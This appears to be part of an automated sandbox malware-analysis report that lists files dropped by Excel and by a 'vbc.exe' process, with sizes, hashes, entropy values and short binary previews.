      Entropy (8bit):7.932023348968795
      Encrypted:false
      SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
      MD5:5EB99F38CB355D8DAD5E791E2A0C9922
      SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
      SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
      SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview:.PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
      Category:dropped
      Size (bytes):2647
      Entropy (8bit):7.8900124483490135
      Encrypted:false
      SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
      MD5:E46357D82EBC866EEBDA98FA8F94B385
      SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
      SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
      SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):10202
      Entropy (8bit):7.870143202588524
      Encrypted:false
      SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
      MD5:66EF10508ED9AE9871D59F267FBE15AA
      SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
      SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
      SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
      Malicious:false
      Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):10202
      Entropy (8bit):7.870143202588524
      Encrypted:false
      SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
      MD5:66EF10508ED9AE9871D59F267FBE15AA
      SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
      SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
      SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
      Malicious:false
      Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
      Category:dropped
      Size (bytes):4396
      Entropy (8bit):7.884233298494423
      Encrypted:false
      SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
      MD5:22FEC44258BA0E3A910FC2A009CEE2AB
      SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
      SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
      SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
      Malicious:false
      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):5396
      Entropy (8bit):7.915293088075047
      Encrypted:false
      SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
      MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
      SHA1:556C229F539D60F1FF434103EC1695C7554EB720
      SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
      SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
      Malicious:false
      Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
      Category:dropped
      Size (bytes):2647
      Entropy (8bit):7.8900124483490135
      Encrypted:false
      SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
      MD5:E46357D82EBC866EEBDA98FA8F94B385
      SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
      SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
      SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
      Malicious:false
      Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
      Category:dropped
      Size (bytes):4396
      Entropy (8bit):7.884233298494423
      Encrypted:false
      SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
      MD5:22FEC44258BA0E3A910FC2A009CEE2AB
      SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
      SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
      SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
      Malicious:false
      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):11303
      Entropy (8bit):7.909402464702408
      Encrypted:false
      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
      Malicious:false
      Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):11303
      Entropy (8bit):7.909402464702408
      Encrypted:false
      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
      Malicious:false
      Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
      Category:dropped
      Size (bytes):3747
      Entropy (8bit):7.932023348968795
      Encrypted:false
      SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
      MD5:5EB99F38CB355D8DAD5E791E2A0C9922
      SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
      SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
      SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
      Malicious:false
      Preview:.PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.
      Process:C:\Users\Public\vbc.exe
      File Type:data
      Category:dropped
      Size (bytes):67065
      Entropy (8bit):6.6304639756916615
      Encrypted:false
      SSDEEP:1536:/4hyDx26jHEn+GRp9RxjB6JG5ixTugnzsU:D9Vs1pTxV6JGsugzR
      MD5:270B01C8C789557B4D6DEEDFDB1050AD
      SHA1:3445451F85C3BD8824E984977A71268FA4F82240
      SHA-256:6A7FB12A3EE8E9F070024D4573FF1A058451179EC46A1AD2ABC8D2B704E82F37
      SHA-512:69ADFE79E91881FD1A075F57CC1B2B4EFC75FF464546AA8C52EE858B4ED70AF65E61946C952A848491A4CA0629A2E3C86A62DDF6A05DB56C1A35553D392A048F
      Malicious:false
      Preview:9......._f9.9..?.u.f9.......u.8.....u....8......9....u.....bg9....b.D-f9....(~..9.9.....8.9...R.>..f9......>..f9.S..u...8.8.Z8..1.9.9..4..BG..9......f9.9.u.8.9.W9.8......K...?.CG.S.^.s.y...w`.'.tn........9D..n\U.Xgz.,e..../..~...(..]#...i. ......=....1i.z.=..._UG..*..E.O*..R.....}|V.3qv%.w.7..e.J2q..'....cT..g..P+5..MA...7*S.[{..L......N.....%pb....8._4.........8...G...~./.d..:.m.Ax...............................................?..3:....G..UG..Pr................................................~.Pv.....................................................*.o........................................Rh.k............................................WD.9>z.k............................................Rk.k............................................RW.=.................................................{..>~F.BG..G.B...............................................{.=......................................................Y................................................?
      Process:C:\Users\Public\vbc.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):12288
      Entropy (8bit):5.814115788739565
      Encrypted:false
      SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
      MD5:CFF85C549D536F651D4FB8387F1976F2
      SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
      SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
      SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
      Malicious:false
      Antivirus:
      • Antivirus: Virustotal, Detection: 0%, Browse
      • Antivirus: Metadefender, Detection: 0%, Browse
      • Antivirus: ReversingLabs, Detection: 0%
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Users\Public\vbc.exe
      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):23040
      Entropy (8bit):5.575148216618883
      Encrypted:false
      SSDEEP:384:A9zuL7jiVVvNORNHzTdXaP4osxlUoLYuC/NWiOCW:A8zc2RJdqP4oLoQ/8
      MD5:E1FA0E4751888A35553A93778A348A24
      SHA1:98667AE0AB2D955E69C365D62F2DD1A8C839E14E
      SHA-256:A074AA8C960FF9F9F609604DB0B6FEFDD454CEB746DE6749753A551FE7B99B51
      SHA-512:E93E62CC3FFBC2621FD87BD6DAEDF3699799217B49A006D4A891CDBFE4DD89B33DA258C6A4D8CC28FF615CC0F033D83BF761502169D05A6FC9CBC5FF5FC2ABF1
      Malicious:false
      Antivirus:
      • Antivirus: Metadefender, Detection: 0%, Browse
      • Antivirus: ReversingLabs, Detection: 0%
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4...p...p...p...y.7.d...d...s...p...K...d...v...d...q...d...v...d.[.q...d...q...Richp...........PE..L..................!.....<.......... ........P.....Q......................................@E........................P3.......`..................................X...`...T............................................`.......1.......................text...~;.......<.................. ..`.data...8....P.......@..............@....idata..D....`.......D..............@..@.didat..0....p.......N..............@....rsrc................P..............@..@.reloc..X............V..............@..B................................................................................................................................................................................................................................................................................................
      Process:C:\Users\Public\vbc.exe
      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):23040
      Entropy (8bit):6.138116359523764
      Encrypted:false
      SSDEEP:384:4j1Pm6AenqNEb9jGvRtb30lEVybDPukC+Rfb6ql4PrxWpmWZr:xlMsP4l2ybJawRr
      MD5:3F305E85F2751C4AA1A4EFDF3240EDA6
      SHA1:FBD849B83E98E5D0F2A2B2F8E3649ADA7078B2E9
      SHA-256:95444BF7752F9092FE00CA6F96FD170820026ED990B1EA59CE34524978B4EB12
      SHA-512:3BC1B150ACC164818C169448E7BCD8BEC7780278E60581E3A21722BE947BDF6016D7A99FB1F06E59057F71A3C965CD882CA974EAF288172D5285B1CEA93769C6
      Malicious:false
      Antivirus:
• Antivirus: Metadefender, Detection: 0%
      • Antivirus: ReversingLabs, Detection: 0%
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.I...'...'...'.......'...$...'...#...'...&.B.'...&...'..."...'...'...'.......'......'...%...'.Rich..'.................PE..L.....{............!.....B..........pH.......`.......................................P....@A........................PQ......(q..........................................T...........................h................p..$............................text....A.......B.................. ..`.data........`.......F..............@....idata.......p.......H..............@..@.rsrc................R..............@..@.reloc...............V..............@..B................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):512
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3::
      MD5:BF619EAC0CDF3F68D496EA9344137E8B
      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
      Malicious:false
      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):512
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3::
      MD5:BF619EAC0CDF3F68D496EA9344137E8B
      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
      Malicious:false
      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:CDFV2 Encrypted
      Category:dropped
      Size (bytes):191800
      Entropy (8bit):7.957948536702047
      Encrypted:false
      SSDEEP:3072:ri+vYKahh4qHgG0XHCoJVUEmX1j+jrbr9qfXeqHe4O0ViaAb2PxFSfzw4+MdEPvS:GpCqHqiJEmX1j2rbpAXeqdOrPbxCMc5E
      MD5:E96BAF78F2A98321AE47D4D82E608124
      SHA1:E9EA3B397B7C2D5BE07845745F621AEF0D8D4DB0
